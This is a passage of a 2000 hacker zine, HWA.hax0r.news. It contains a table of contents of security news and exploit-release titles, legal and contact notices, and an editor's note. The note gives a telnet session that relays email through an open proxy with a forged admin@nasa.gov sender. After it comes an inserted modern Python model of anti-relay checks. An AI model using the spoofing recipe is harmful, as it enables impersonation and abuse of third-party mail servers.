   150.0  .. [HNN] June 12'00 Radio Interferer Gets Five Years 
   151.0  .. [HNN] June 12'00 Indonesian Arrested in Australia For Attacking Singapore 
   152.0  .. [HNN] June 12'00 Evidence to Support Cell Phone Ban Now Available 
   153.0  .. [HNN] June 13'00 Hard Drives With Nuke Secrets Disappear 
   154.0  .. [HNN] June 13'00 Police Stumble onto Pirates 
   155.0  .. [HNN] June 13'00 Social Aspects of the Love Bug 
   156.0  .. [HNN] June 13'00 Interview with Bruce Schneier 
   157.0  .. [HNN] June 13'00 IC-Crypt 128 Goes Freeware 
   158.0  .. [HNN] June 13'00 IronBox Releases New Articles 
   159.0  .. [HNN] June 13'00 Hong Kong Government Defaced, Again 
   160.0  .. [HNN] June 14'00 RootFest Opens Today 
   161.0  .. [HNN] June 14'00 Email Hoax Panics Credit Card Holders 
   162.0  .. [HNN] June 14'00 FAA Fails to Conduct Background Checks on Computer Contractors 
   163.0  .. [HNN] June 14'00 @stake Announces Technical Advisory Board 
   164.0  .. [HNN] June 14'00 Site Forced to Hand Over User Identities 
   165.0  .. [HNN] June 14'00 ITN Email Compromised 
   166.0  .. [HNN] June 15'00 Philippine President Signs Computer Crime Law 
   167.0  .. [HNN] June 15'00 MPAA vs 2600 Transcripts Released 
   168.0  .. [HNN] June 15'00 Raytheon Unveils SilentRunner 
   169.0  .. [HNN] June 15'00 30 year Old Security Report Still Useful 
   170.0  .. [HNN] June 15'00 15 yr old Receives Classified Documents 
   171.0  .. [HNN] June 15'00 Underground Tools 
   172.0  .. [HNN] June 16'00 Political Candidates Deface Web Pages 
   173.0  .. [HNN] June 16'00 Mitnick Seeks to Renew Ham License 
   174.0  .. [HNN] June 16'00 Value of Microsoft Trash On the Rise 
   175.0  .. [HNN] June 16'00  China Sentences Man to Death 
   176.0  .. [HNN] June 16'00 OpenBSD 2.7 Now Available 
   177.0  .. [HNN] June 16'00 RootFest Ends Today 
   178.0  .. [HNN] June 16'00 White Paper: Internet Identity Theft 
   179.0  .. [HNN] June 16'00 New Ezines 
   180.0  .. [HNN] June 19'00 AOL Confirms Compromise 
   181.0  .. [HNN] June 19'00 College of Dupage Make Unfounded Claims Regarding CyberCop School 
   182.0  .. [HNN] June 19'00 Los Alamos Hard Drives Found 
   183.0  .. [HNN] June 19'00 Japanese Exercise CyberCrime Law 
   184.0  .. [HNN] June 19'00 Anti Pedophile Groups Take on the Net 
   185.0  .. [HNN] June 19'00 More E-Zines 
   186.0  .. [HNN] June 20'00 Stages Virus Starts to Become Widespread 
   187.0  .. [HNN] June 20'00 Employees Sue Employer For Firing Over NetBus 
   188.0  .. [HNN] June 20'00 The Cyberterror Scare of 2000 
   189.0  .. [HNN] June 20'00 AOL Increases Network Security 
   190.0  .. [HNN] June 20'00  Poll Says Americans Are Afraid of CyberCrime 
   191.0  .. [HNN] June 20'00  Cyber Defense Still Looked at As Part of Cold War 
   192.0  .. [HNN] June 20'00  FAA Opens Cyber Security Office 
   193.0  .. [HNN] June 21'00 Credit Taken for Stages Worm 
   194.0  .. [HNN] June 21'00 Drug Office Tracks Web Visitors 
   195.0  .. [HNN] June 21'00 NATO Unleashes Offensive Cyberwar Weapon 
   196.0  .. [HNN] June 21'00 Mexico Hires Hackers To Crack Password 
   197.0  .. [HNN] June 21'00 Privacy Issues Get Attention In Congress 
   198.0  .. [HNN] June 21'00 More Speakers for H2K 
   199.0  .. [HNN] June 22'00 White House Supports P3P 
   200.0  .. [HNN] June 22'00 FSA Calls Bank Security Weak 
   201.0  .. [HNN] June 22'00 Nike.com Redirected 
   202.0  .. [HNN] June 22'00 Cybercafes labeled 'Electronic Heroin' 
   203.0  .. [HNN] June 22'00 Freeware Available to Track Napster Users 
   204.0  .. [HNN] June 22'00 ECTF labeled Cyber-Mod Squad 
   205.0  .. [HNN] June 22'00 Eleven Story Tall Tetris Game 
   206.0  .. [HNN] June 23'00 DMCA Hearings Held By US Copyright Office 
   207.0  .. [HNN] June 23'00 COPA Appeal Rejected!
   208.0  .. [HNN] June 23'00 Mitnick Back In Court 
   209.0  .. [HNN] June 23'00 Security Glitch Brings Lawsuit 
   210.0  .. [HNN] June 23'00 UAE Files Charges Against British Worker 
   211.0  .. [HNN] June 23'00  Feedback on Female Hackers 
   212.0  .. [HNN] June 23'00 Online Retailers Don't Provide Adequate Security 
   213.0  .. [HNN] June 23'00 Better to Be Scared Than Sorry? 
   214.0  .. [HNN] June 23'00 Snooping Enters the Mainstream 
   215.0  .. [HNN] June 26'00 24,000 Credit Card Numbers At Risk
   216.0  .. [HNN] June 26'00  Russians Introduce Cyber Doctrine 
   217.0  .. [HNN] June 26'00 Mitnick In Court Today 
   218.0  .. [HNN] June 26'00 More Info Reported Missing At Los Alamos 
   219.0  .. [HNN] June 26'00 The HoneyNet Research Project 
   220.0  .. [HNN] June 26'00 Cell Phones And Driving Don't Mix 
   221.0  .. [HNN] June 26'00 New Viruses Attack The Soul 
   222.0  .. [HNN] June 26'00 Traditional Hackers Upset Over Use of Term 
   223.0  .. [HNN] June 27'00 Oracle Admits to Spying on Microsoft 
   224.0  .. [HNN] June 27'00  FBI To Investigate Stages Worm 
   225.0  .. [HNN] June 27'00  Mattel Will Remove Spyware 
   226.0  .. [HNN] June 27'00 Russia Accuses Lithuanian of Hacking For The US 
   227.0  .. [HNN] June 27'00 BSA Settles With 20 Companies  
   228.0  .. [HNN] June 27'00 UAE Telecom Firm Will Prosecute 
   229.0  .. [HNN] June 28'00 Oracle Admits to Spying on Microsoft 
   230.0  .. [IND] UK: White-hat Hacker Engaged In Black Arts
   231.0  .. [IND] India: Licensed To Bill - `Ethical Hackers' Get Paid To Crack E-security.
   232.0  .. [IND] Hackers Shoot, Score On NHL Web Site
   233.0  .. [IND] Computer whiz alters high school's grades
   234.0  .. [HNN] Jun 29'00 Australian Tax Office Allegedly Compromised 
   235.0  .. [HNN] Jun 29'00 AOL Tells FCC That IM Security Is Top Priority 
   236.0  .. [HNN] Jun 29'00 McCain Still Pushing for Filtering 
   237.0  .. [HNN] Jun 29'00 Lawsuit Filed Over Nike Redirection 
   238.0  .. [HNN] Jun 29'00 eCrime Documentary 
   239.0  .. [HNN] Jun 29'00 E-mail Used As Evidence In Korea 
   240.0  .. [HNN] Jun 30'00 AOL Users Subjected to Social Engineering 
   241.0  .. [HNN] Jun 30'00 ZDNet Launches Echelon Study 
   242.0  .. [HNN] Jun 30'00 Interpol and Atomic Tangerine Announce Collaboration 
   243.0  .. [HNN] Jun 30'00 Survey Results Show That Precautions Lag Concerns 
   244.0  .. [HNN] Jun 30'00 Student Confesses to Numerous Private and Government Attacks 
   245.0  .. [HNN] Jun 30'00 Threat From Russia? 
   246.0  .. [HNN] Jun 30'00 Zines Update 
   247.0  .. [IND] May 26th: Lights Out
   248.0  .. [IND] May 30th Anti-Metallica Hackers Hit DC Metro Web Site
   249.0  .. [IND] June 1st Hackers Drawn By The Thrills, The Challenge or Just Plain Cash 
   250.0  .. [IND] Web Hijackers Pilfer Internet Domain Names
   251.0  .. [IND] High-Tech Crooks Thrive in Russia
   252.0  .. [TXT] Treatise: "Why EFnet Sucks." by: Anonymous Whiner
   253.0  .. [HWA] Honeypots: who's fooling who?
   254.0  .. [IND] Hacking Away At Government
   255.0  .. [IND] Default passwords list
   256.0  .. [IND] Security Firm To List Additional Hacking Threats
   257.0  .. [IND] SANS: Top 10 hacker targets
   258.0  .. [0x4] Justin Tanner aka Agent Steal in amazing plot escapes again.
   259.0  .. [IND] Peeping Through Port 139
   260.0  .. [IND] Hacker Hits Road Runner Server;
   261.0  .. [IND] Swedish Hacker-Tracker Is FBI And Media Darling
   262.0  .. [IND] Hackers Force HK Government Website to Shut Down Again
   263.0  .. [IND] Dozens of Malaysian Political Web Sites Hacked
   264.0  .. [IND] Youth Nabbed in Singapore for Hacking in Australia
   265.0  .. [IND] Facing a Mans World:Female Hackers Battle Sexism to Get Ahead
   266.0  .. [IND] Social study: staunch religious hackers?
   267.0  .. [IND] Ex-KGB Major Leads US War Against Hackers
   268.0  .. [IND] Flagship Hong Kong Govt Web Site Defaced, Twice
   269.0  .. [IND] Modest Teenager Is FBI's Secret Weapon In War Against Cyber Crime
   270.0  .. [IND] Daemons on the Net:Stereotyping the hacker **
   271.0  .. [IND] China: Defiant Cyber Surfers Play Cat-and-Mouse Game
   272.0  .. [IND] Hacker's Humorous Tips to Websites
   273.0  .. [IND] r00tfest 2000: Computer Hackers Ride into Town Today
   274.0  .. [IND] UK Watchdog Warns Net Banks Over Hackers
   275.0  .. [IND] Hacker Attacks Gun Control Group's Web Site
   276.0  .. [IND] Hackers Attack Nike, United Arab Emirates Sites
   277.0  .. [IND] Rock Band's Answer To Napster: Sabotage
   278.0  .. [IND] Pro-gun Hackers Take Over Web Site
   279.0  .. [IND] Hacker Taps Into 24,000 Credit Cards
   280.0  .. [IND] Etisalat Vows to Prosecute Internet Hackers
   281.0  .. [IND] Foundstone's Ultimate Hacking Course Available at Black Hat Briefings
   282.0  .. [IND] Student Admits Hacking U.S. Government Computers
   283.0  .. [IND] Hacker may have endangered astronauts 
   284.0  .. [IND] July 2000: Accused UAE Hacker Files Defamation Lawsuit
   285.0  .. [IND] July 2000: NASA Denies Hacker Attack Danger
   286.0  .. [IND] July 2000: 'Houston, We Don't Have A Problem.' 
   287.0  .. [IND] July 2000: Crackers are Common Criminals
   288.0  .. [IND] May 2000: Black Hat Briefings -Singapore, May 2000
   289.0  .. [IND] FBI Investigating Qualcomm Hacker
   290.0  .. [IND] Lloyd's Offers Hacker Insurance
   291.0  .. [MM] Man charged with breaking into NASA computers
   292.0  .. [MM] The FBI's Carnivore(s) Initiative (More big brother)
   293.0  .. [IND] Forbidden Knowledge calls it quits.
   294.0  .. [b0f] Lamagra's "roothat" hacker wargames, hack legally!
   295.0  .. [HWA] Out of the quagmire, something interesting emerges: b10z crew
   296.0  .. [MM] Cnet:AltaVista credits players $1 after contest error 
   297.0  .. [HWA] Securax "socksploitation" tutorial
   298.0  .. [IND] Hacktivism: Hacktivismo with cDc
   299.0  .. [IND] Hacktivism: GForce using website defacements to spread their word
   300.0  .. [HNS] Help Net Security News Letter #20
   301.0  .. [MM] NAPSTER GETS ORDERED TO BE SHUT DOWN IS THE FIGHT LOST?
   302.0  .. [IND] Paper: Know your enemy #1 by Lance Spitzner  
   303.0  .. [IND] Paper: Know your enemy #2 by Lance Spitzner
   304.0  .. [IND] Paper: Know your enemy #3: Forensic Analysis by Lance Spitzner
   305.0  .. [IND] Paper: Know your enemy #4 by Lance Spitzner : The motives
   306.0  .. [IND] Support docs and logs from the Know your enemy papers
   307.0  .. [IND] Trinoo DDoS Analysis
   308.0  .. [IND] Remote root exploit HOW-TO by E-mind
   309.0  .. [IND] Paper: Armoring Linux by Lance Spitzner (July 28th 2000)
   310.0  .. [IND] Paper: Tracking Hackers On Irc by Theory Group
   311.0  .. [IND] More spies in the wires..software that snoops on you and more.
   312.0  .. [IND] Why Linux sucks.
   313.0  .. [IND] Article submission on 'Social Engineering' by tekneke
   314.0  .. [IBT] Ethics & The Underground, What the hell happened? - Gh0zt
   315.0  .. [IND] PCFS.C by Mixter
   316.0  .. [IND] The hypocrisy runs rampant prizm mr anti-defacement himself defaces?
   317.0  .. [MM] Do you have an imaginary friend? no? are you sure?? 
   318.0  .. [HWA] What ever happened to .... 7thSphere?
   319.0  .. [IND] Study Shows: FBI Alienates Industry Security Experts
   320.0  .. [HWA] Silly IRC logs for your amusement and edufication   
   321.0  .. [HWA] The strange case of Cruci's birthday dog
   322.0  .. [HWA] Interview: Herbless mass defacer in limelight recently by PhantasmP
   323.0  .. [HWA] Interview with Pimpshiz in limelight recently by SugarKing
   324.0  .. [HWA] BS interview with DeC who hosed us but it was mildly amusing..by Cruciphux
   325.0  .. [HWA] Interview: Mixter by Cruciphux (NOT SugarKing)
   326.0  .. [HWA] Interview: back to business, political hackers GForce by SugarKing      
   327.0  .. [HWA] Interview: Ph33r the B33r by SugarKing
   327.1  .. [HWA] Interview: BeC some oldskewl muscle makes some noise.(additional feature)
   328.0  .. [HWA] Release: eth0 releases sscan2k-pre6 scanner
   329.0  .. [HWA] Release: WhiteRuss w00p local BFTPD exploit PoC
   330.0  .. [HWA] Release: xitami.c DoS by forrest
   331.0  .. [HWA] Release: unicode M$ hack similar to those seen used recently by: Grazer
   332.0  .. [HWA] Release: Hlds Half life server vuln by csh **
   333.0  .. [HWA] Release: trans0ft brokerftp vuln by eth0
   334.0  .. [HWA] Release: Grazer releases R2D2 dos
   335.0  .. [HWA] The Bind P3 exploit revealed.
   336.0  .. [HWA] Darknet.hwa-security.net Mirror opens
   337.0  .. [IND] from the didn't they die? files: genocide2600.com oldskewl revisited
   338.0  .. [HWA] Nov 2000: The day efnet nearly died, The ShadowKnight and Mafiaboy crusade
   339.0  .. [IND] Nov 2000: Arab Hackers Hit U.S. Firm for Israeli Ties
   340.0  .. [HWA] Nov 2000: HOTNEW at time of print, mass hack/dos of gaming sites 
   341.0  .. [IND] Nov 2000: Paranoia Vs. Transparency And Their Effects On Internet Security
   342.0  .. [IND] Nov 2000: Trouble in the Holy land, Cyberwar and the Israeli Underground's Press Release.
   343.0  .. [IND] Nov 2000: NOCPulse and ISS warn of impending DDoS attacks this Christmas
   344.0  .. [IND] Oct 2000: Carnivore does more than previously thought
   345.0  .. [IND] Nov 2000: Surprise! RSA releases crypto patent ahead of schedule
   346.0  .. [IND] Nov 2000: Hackers: The millennial scapegoats?
   347.0  .. [IND] Nov 2000: Student Arrested in Emulex Hoax Case
   348.0  .. [EXP] Nov 2000: 0Day (yeah sure) exploit for WuFTPD < 2.6.1 fx9.c
   
   <MORE> .. [HWA] Hidden tracks
   
   #57 is in progress with current news/exploits and releases, no due date projected at
       this time. - Cruci
        
    =-------------------------------------------------------------------------=
    
        
    AD.S  .. Post your site ads or etc here, if you can offer something in 
             return that's tres cool, if not we'll consider ur ad anyways so
             send it in. Ads for other zines are ok too btw just mention us 
             in yours, please remember to include links and an email contact.
             
    Ha.Ha .. Humour and puzzles  ............................................
             
              Oi! laddie! send in humour for this section! I need a laugh 
              and it's hard to find good stuff... ;)...........................

    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
       *      COMMON TROJAN PORTS LISTING.....................................       
     A.1   .. PHACVW linx and references......................................
     A.2   .. Hot Hits (.gov and .mil + other interesting traffic on our site)
     A.3   .. Mirror Sites list...............................................
     A.4   .. The Hacker's Ethic 90's Style..................................
     A.5   .. Sources........................................................
     A.6   .. Resources......................................................
     A.7   .. Submission information.........................................
     A.8   .. Mailing lists information......................................
     A.9   .. Whats in a name? why HWA.hax0r.news??..........................
     A.10  .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again).
     A.11  .. Underground and (security?) Zines..............................
     
        *  Feb 2000 moved opening data to appendices, A.2 through A.10, probably
           more to be added. Quicker to get to the news, and info etc... - Ed 
    =--------------------------------------------------------------------------=
     
     @HWA'99, 2000
     
   

     
  00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
       =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     
  

                         _                     _
                        | |    ___  __ _  __ _| |
                        | |   / _ \/ _` |/ _` | |
                        | |__|  __/ (_| | (_| | |
                        |_____\___|\__, |\__,_|_|                           
                                   |___/
                               


     THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF 
     THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE 
     RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
     IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS 
     (SEE FAQ).

     Important semi-legalese and license to redistribute:

     YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE 
     GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS 
     Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S
     ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is 
     http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE 
     ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL 
     I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email 
                         
                         cruciphux@dok.org

     THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS
     ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT
     AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
     
     I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND 
     REDISTRIBUTE/MIRROR. - EoD
     
     
                            ** USE NO HOOKS **

 
      Although this file and all future issues are now copyright, some of the 
      content holds its own copyright and these are printed and respected. News 
      is news so i'll print any and all news but will quote sources when the 
      source is known, if it's good enough for CNN it's good enough for me. And 
      i'm doing it for free on my own time so pfffft. :)

     No monies are made or sought through the distribution of this material.      
     If you have a problem or concern email me and we'll discuss it.

     HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts      
     Warez Archive?), and does not condone 'warez' in any shape manner or 
     form, unless they're good, fresh 0-day and on a fast site. <sic>
     
     HWA.hax0r.news is now officially sponsored by the following entities:
     
     HWA Internet Security
     http://hwa-security.net/
     
     CubeSoft Communications
     http://www.csoft.net/
     
     We strongly suggest Csoft for your hosting needs, tell them cruciphux
     from HWA sent you. Contact julien@csoft.net for details and check the
     site for plans available.
     
     
     
     
     
     Rights of sources included in our newsletter/zine
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Some sources and agencies impose unfair limitations and restrictions on 
     the use of their data, I do not generally ask permission to include the
     articles from major media or other persons that have published material
     on the net, imho this material is public domain.
     
     Example:
     
     "This material is subject to copyright and any unauthorised use, copying or 
     mirroring is prohibited. "
      
     This notice will be disregarded; we don't charge for access to these archives,
     if anything we're doing the site(s) a favour by disseminating their news. 
     Legal action will result in a civil disobedience action and will incur 
     underground continuance of our zine.
      
      
 
     cruciphux@dok.org
 
     Cruciphux [C*:.] HWA/DoK Since 1989

     


  00.1 CONTACT INFORMATION AND MAIL DROP      
       =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     
      
                     ____            _             _
                    / ___|___  _ __ | |_ __ _  ___| |_ ___
                   | |   / _ \| '_ \| __/ _` |/ __| __/ __|
                   | |__| (_) | | | | || (_| | (__| |_\__ \
                    \____\___/|_| |_|\__\__,_|\___|\__|___/


       Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
      Canada / North America (hell even if you are inside ..) and wish to
      send printed matter like newspaper clippings a subscription to your
      cool foreign hacking zine or photos, small non-explosive packages
      or sensitive information etc etc well, now you can. (w00t) please
      no more inflatable sheep or plastic dog droppings, or fake vomit
      thanks.

      Send all goodies to:
    
    
      Address changed from:

	 X HWA NEWS
	 X P.O BOX 44118
	 X 370 MAIN ST. NORTH
	 X BRAMPTON, ONTARIO
	 X CANADA
	 X L6V 4H5
	    	
      to:
         
         HWA
         P.O BOX 44118
         POSTAL OUTLET UNIT #9
         ONE WEXFORD ROAD
         BRAMPTON, ONTARIO
         CANADA
         L6Z 4V7
     
     	    	
	    
	    
    
     WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
     ~~~~~~~  are reading this from some interesting places, make my day and 
              get a mention in the zine, send in a postcard, I realize that 
              some places it is cost prohibitive but if you have the time and
              money be a cool dude / gal and send a poor guy a postcard 
              preferably one that has some scenery from your place of 
              residence for my collection, I collect stamps too so you kill
              two birds with one stone by being cool and mailing in a postcard,
              return address not necessary, just a  "hey guys being cool in
              Bahrain, take it easy" will do ... ;-) thanx.



     Ideas for interesting 'stuff' to send in apart from news:

      - Photo copies of old system manual front pages (optionally signed by you) 
      - Photos of yourself, your mom, sister, dog and or cat in a NON
        compromising position plz I don't want pr0n. <g>
      - Picture postcards
      - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
        tapes with hack/security related archives, logs, irc logs etc on em.
      - audio or video cassettes of yourself/others etc of interesting phone
        fun or social engineering examples or transcripts thereof.
      
      
      Stuff you can email:
      
      - Prank phone calls in .ram or .mp* format
      - Fone tones and security announcements from PBX's etc
      - fun shit you sampled off yer scanner 
      - reserved for one smiley face ->        :-)            <-
      - PHACV lists of files that you have or phac cd's you own (we have a burner)
      - burns of phac cds (email first to make sure we don't already have em)
      - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc 
      
  
      If you still can't think of anything you're probably not that interesting
      a person after all so don't worry about it <BeG>
  
      Our current email:
  
      Submissions/zine gossip.....: cruciphux@dok.org                                                                   
      Private email to editor.....: cruciphux@dok.org                                                                   
      Distribution/Website........: sas2@usa.net       
      
      Other methods:
      
      Cruciphux's ICQ:58303688 note; not always online, and do not abuse or use 
      for lame questions!
      My Preferred chat method: IRC Efnet in
                  
                         #hwa-security or #HWA.hax0r.news
  
      @HWA
    
    

 00.2 WHO ARE WE AND WHY?
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     
      
      "The number one use of NT servers on the internet today is definitely
      that of the web defacement artist" - Gallop poll May 2000         

      We have definitely evolved since 1998, we now have a second website with
      dynamic news content and a fresh kicking new layout soon to be implemented
      and also a killer coding team working on security vulnerabilities exploits
      and auditing software and building new tools. Watch us closely over time
      as we grow and produce some worthwhile product for the compsec/(and also
      indirectly) underground contingent of the hacking scene.
          
      http://hwa-security.net/about.html
      
      
      http://hwa-security.net/contact.html
    
      @HWA



 01.0 Greets!?!?!
      
                           ____               _
                          / ___|_ __ ___  ___| |_ ___
                         | |  _| '__/ _ \/ _ \ __/ __|
                         | |_| | | |  __/  __/ |_\__ \
                          \____|_|  \___|\___|\__|___/


     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, what's good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in
     your thoughts anyway. 
     
       
     GREETS
     ~~~~~~  
       
     Hi m0m!
     
     
     All HWA members and new inductees, people that filled out jobs.php
     and are still on waiting list...
     
     #hwa-security , #hwa.hax0r.news etc
     
     
     
     
     DISSES?
     ~~~~~~~
     
     You get the biggest dis of them all, your name(s) will not
     even be mentioned here in the zine, you are nothing. You
     know who you are, deal and squeal.
     
     EoF
     
     
     
 01.1 Last minute stuff, rumours and newsbytes
      
            
          
                _   _                   ____        _
               | \ | | _____      _____| __ ) _   _| |_ ___ ___
               |  \| |/ _ \ \ /\ / / __|  _ \| | | | __/ _ Y __|
               | |\  |  __/\ V  V /\__ \ |_) | |_| | ||  __|__ \
               |_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/
                                              |___/
                          
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=                           
                           
         
      SECTION DELETED    
         
      @HWA

 01.2 MAILBAG - email and posts from the message board worthy of a read 
      
      
      SECTION DELETED    
      
      @HWA
      
      
 02.0 Words from the editor.
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      
      
                        _____    _ _ _             _
                       | ____|__| (_) |_ ___  _ __( )__
                       |  _| / _` | | __/ _ \| '__|/ __|
                       | |__| (_| | | || (_) | |   \__ \
                    ___|_____\__,_|_|\__\___/|_|   |___/
                   / ___|  ___   __ _ _ __ | |__   _____  __
                   \___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ /
                    ___) | (_) | (_| | |_) | |_) | (_) >  <
                   |____/ \___/ \__,_| .__/|_.__/ \___/_/\_\
                                     |_|

      

      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


     #include <stdio.h>
     #include <thoughts.h>
     #include <backup.h>

     main()
         {
           printf ("Read commented source!\n\n");

         /* Well, I broke the rules again, yeah ... decided it was time
          * to re-setup my system and overhaul my production box, well
          * naturally I forgot to back up a few things including several
          * email folders and .. the bulk of this issue (#54) so ... it
          * is inevitable that this issue is unfortunately incomplete at
          * best.
          * 
          * If you submitted articles etc for this issue and they did not
          * appear please kindly resend them and i'll include in the next
          * release, apologies to all.
          * 
          * 
          * Cruci-
          *
          * cruciphux@dok.org
          *
          */
           
     printf ("EoF.\n");
           }
           
         
	    
      Anonymous email:
      
      telnet (wingate ip) (see our proxies list)
      Wingate>0.0.0.0
      Trying 0.0.0.0...
      Connected to target.host.edu
      Escape character is '^]'.
      220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
      HELO bogus.com
      250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
      MAIL FROM: admin@nasa.gov
      250 admin@nasa.gov... Sender ok
      RCPT TO: cruciphux@dok.org
      250 cruciphux@dok.org... Recipient ok
      DATA
      Secret cool infoz
      .
      QUIT
      
      If you got that far everything is probably ok, otherwise you might see
      550 cruciphux@dok.org... Relaying denied
      
      or
      
      550 admin@nasa.gov... Domain must exist
            
      etc.
      
      
      
      * This won't work on a server with up-to-date rule sets denying relaying and your
        attempts will be logged so we don't suggest you actually use this method to
        reach us, it's probably also illegal (theft of service) so, don't do it. ;-)
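
      The server-side rule behind the "Relaying denied" and "Domain must exist"
      replies above, as an added example (not part of the original zine and not
      Sendmail's own code): a simplified Python model of the accept/reject decision
      and the log entry it leaves. The class and function names, the 192.0.2.10
      client address, the 10.0.0.0/8 relay network and the set standing in for DNS
      are all constructed for illustration.

```python
"""Simplified model of an MTA's anti-relay checks (added example, not Sendmail code)."""
import ipaddress
from dataclasses import dataclass, field


def clean(address):
    """Strip whitespace and optional <> around an SMTP path."""
    return address.strip().strip("<>").strip()


def domain_of(address):
    """Return the lower-cased domain part, or '' for an unqualified/null address."""
    addr = clean(address)
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


@dataclass
class RelayPolicy:
    local_domains: set        # domains this server accepts mail for
    relay_networks: list      # client networks allowed to relay to other domains
    resolvable_domains: set   # constructed stand-in for a DNS lookup (runs offline)
    log: list = field(default_factory=list)

    def client_may_relay(self, client_ip):
        addr = ipaddress.ip_address(client_ip)
        return any(addr in ipaddress.ip_network(net) for net in self.relay_networks)

    def check_mail(self, client_ip, sender):
        addr = clean(sender)
        domain = domain_of(addr)
        # Null ("<>") and unqualified senders pass; a named domain must resolve.
        if domain and domain not in self.resolvable_domains:
            return self._reject(client_ip, "MAIL", addr, "Domain must exist")
        return 250, f"{addr}... Sender ok"

    def check_rcpt(self, client_ip, rcpt):
        addr = clean(rcpt)
        domain = domain_of(addr)
        is_local = domain == "" or domain in self.local_domains
        # Relay only when the recipient is ours or the client is a trusted network.
        if is_local or self.client_may_relay(client_ip):
            return 250, f"{addr}... Recipient ok"
        return self._reject(client_ip, "RCPT", addr, "Relaying denied")

    def _reject(self, client_ip, verb, addr, reason):
        # The rejected attempt is recorded with the address the server saw.
        self.log.append({"client": client_ip, "verb": verb,
                         "addr": addr, "reason": reason})
        return 550, f"{addr}... {reason}"


def replay(policy, client_ip, commands):
    """Feed client command lines to the policy; return the (code, text) replies."""
    replies, have_sender = [], False
    for line in commands:
        verb, _, arg = line.partition(":")
        verb = " ".join(verb.upper().split())
        if verb == "MAIL FROM":
            reply = policy.check_mail(client_ip, arg)
            have_sender = reply[0] == 250
        elif verb == "RCPT TO":
            reply = (policy.check_rcpt(client_ip, arg) if have_sender
                     else (503, "Need MAIL before RCPT"))
        else:
            continue  # HELO, DATA, QUIT play no part in the relay decision
        replies.append(reply)
    return replies


PROXY_IP = "192.0.2.10"  # constructed: the connecting address the server sees
KNOWN_DOMAINS = {"nasa.gov", "dok.org", "target.host.edu"}  # constructed DNS stand-in
PAGE_SESSION = ["HELO bogus.com",
                "MAIL FROM: admin@nasa.gov",
                "RCPT TO: cruciphux@dok.org"]


def open_relay_policy():
    """Weak setting: every client address is allowed to relay."""
    return RelayPolicy({"target.host.edu"}, ["0.0.0.0/0"], set(KNOWN_DOMAINS))


def hardened_policy():
    """Corrected setting: only the site's own network may relay outward."""
    return RelayPolicy({"target.host.edu"}, ["10.0.0.0/8"], set(KNOWN_DOMAINS))


if __name__ == "__main__":
    for name, policy in (("open relay", open_relay_policy()),
                         ("hardened", hardened_policy())):
        print(name)
        for code, text in replay(policy, PROXY_IP, PAGE_SESSION):
            print(f"  {code} {text}")
        for entry in policy.log:
            print(f"  logged: {entry}")
```

      With the hardened policy, mail addressed to the server's own domain is still
      accepted from any client; only third-party delivery is refused and logged.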
        
      
      
     
     =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     -= start =--= start =--= start =--= start =--= start =--= start =--= start 
     =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=   
     
                       ____            _             _
                      / ___|___  _ __ | |_ ___ _ __ | |_
                     | |   / _ \| '_ \| __/ _ \ '_ \| __|
                     | |__| (_) | | | | ||  __/ | | | |_
                      \____\___/|_| |_|\__\___|_| |_|\__|
